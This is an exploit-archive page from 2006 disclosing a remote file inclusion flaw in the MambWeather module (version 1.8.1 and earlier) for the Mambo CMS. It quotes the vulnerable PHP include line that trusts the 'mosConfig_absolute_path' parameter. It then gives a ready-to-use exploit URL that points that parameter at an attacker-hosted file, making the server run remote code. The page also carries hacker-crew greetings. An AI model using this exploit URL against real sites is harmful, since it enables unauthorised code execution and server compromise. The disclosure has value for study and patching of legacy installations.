[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MambWeather Mambo Module <= 1.8.1 Remote Include Vulnerability
# Published : 2006-10-22
# Author : h4ntu
# Previous Title : Net_DNS <= 0.3 (DNS/RR.php) Remote File Include Vulnerability
# Next Title : SpeedBerg <= 1.2beta1 (SPEEDBERG_PATH) File Include Vulnerabilities
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo module remote inclusion vulneribility
download : http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip
bug found in file : MambWeather/Savant2/Savant2_Plugin_options.php
<?php
/**
* Base plugin class.
*/
global $mosConfig_absolute_path;
require_once $mosConfig_absolute_path.'/modules/MambWeather/Savant2/Plugin.php';
/**
exploit:
http://[site]/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker ]
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker@dalnet
# www.Syue.com [2006-10-22]